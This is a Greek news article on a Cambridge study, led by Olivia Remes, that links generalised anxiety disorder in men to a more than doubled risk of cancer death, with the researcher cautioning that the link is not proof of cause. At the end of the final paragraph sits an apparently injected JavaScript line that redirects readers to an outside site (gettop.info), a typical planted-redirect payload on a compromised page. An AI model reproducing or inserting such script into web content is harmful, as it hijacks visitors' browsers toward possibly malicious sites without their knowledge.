Από καρκίνο κινδυνεύουν οι πολύ αγχώδεις άνδρες

0
4

 

Οι άνδρες που υποφέρουν από γενικευμένο άγχος, έχουν υπερδιπλάσια πιθανότητα να πεθάνουν πρόωρα από καρκίνο.

Όμως το άγχος δεν φαίνεται να συνδέεται με αυξημένους θανάτους από καρκίνο στην περίπτωση των γυναικών, σύμφωνα με μια νέα μεγάλη βρετανική επιστημονική έρευνα.

Οι ερευνητές, με επικεφαλής την Ολίβια Ρέμες της Σχολής Δημόσιας Υγείας του Πανεπιστημίου Κέμπριτζ της Βρετανίας, που έκαναν τη σχετική ανακοίνωση στο συνέδριο του Ευρωπαϊκού Κολλεγίου Νευροψυχοφαρμακολογίας στη Βιέννη (17-20 Σεπτεμβρίου), ανέλυσαν στοιχεία για σχεδόν 16.000 άτομα άνω των 40 ετών, συσχετίζοντας το επίπεδο άγχους καθενός, με τον χρόνο και τον τρόπο θανάτου του σε βάθος 15ετίας.

Η ανάλυση έδειξε ότι οι άνδρες με ΓΑΔ είχαν υπερδιπλάσια πιθανότητα να πεθάνουν από καρκίνο, σε σχέση με όσους δεν είχαν τέτοιο άγχος.

Όμως κάτι ανάλογο δεν διαπιστώθηκε στην περίπτωση των γυναικών με ΓΑΔ. Μελλοντική έρευνα θα διερευνήσει από ποιά συγκεκριμένα είδη καρκίνου κινδυνεύουν περισσότερο οι άνδρες με ΓΑΔ.

Η γενικευμένη αγχώδης διαταραχή είναι ένα κοινό ψυχικό πρόβλημα, που επηρεάζει περίπου το 5% του ενηλίκου πληθυσμού (έναν άνθρωπο στους 20).

Η εν λόγω διαταραχή χαρακτηρίζεται από υπερβολικές –και συχνά ανεξέλεγκτες- ανησυχίες για διάφορες καταστάσεις της καθημερινότητας, με παράλληλα συμπτώματα μυικής έντασης, αϋπνίας, αδυναμίας συγκέντρωσης κ.α. Η ΓΑΔ μπορεί να αυξήσει τον κίνδυνο για μείζονα κατάθλιψη, κατάχρηση εθιστικών ουσιών, τάση για αυτοκτονία κ.α.

«Στο παρελθόν έχουν πραγματοποιηθεί μελέτες για τη σχέση καρκίνου και άγχους, που όμως δεν κατέληξαν σε οριστικά και αδιαμφισβήτητα συμπεράσματα.

Η νέα μελέτη μας είναι η μεγαλύτερη μέχρι σήμερα και διαπίστωσε ότι οι άνδρες με ΓΑΔ, αλλά όχι οι γυναίκες, έχουν υπερδιπλάσια πιθανότητα να πεθάνουν από καρκίνο.

Αυτά τα ευρήματα ισχύουν άσχετα από άλλους παράγοντες, όπως ηλικία, άλλες χρόνιες παθήσεις,, σοβαρές ψυχικές νόσοι, κάπνισμα, αλκοόλ, σωματική δραστηριότητα και λήψη φαρμάκων», ανέφερε η Ρέμες.

Πρόσθεσε όμως ότι «αν και η έρευνά μας δείχνει πως το άγχος συσχετίζεται με τον καρκίνο στους άνδρες, δεν μπορούμε να πούμε ότι το ένα προκαλεί το άλλο.

Είναι πιθανό πως οι άνδρες με γενικευμένο άγχος έχουν ένα τρόπο ζωής ή άλλους παράγοντες κινδύνου, που αυξάνουν τον κίνδυνο καρκίνου».

Τόνισε πάντως ότι «η κοινωνία πρέπει να πάρει πιο σοβαρά το άγχος, ως προειδοποιητικό σημάδι για κακή υγεία και όχι απλώς ως ένα χαρακτηριστικό της προσωπικότητας κάποιου». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here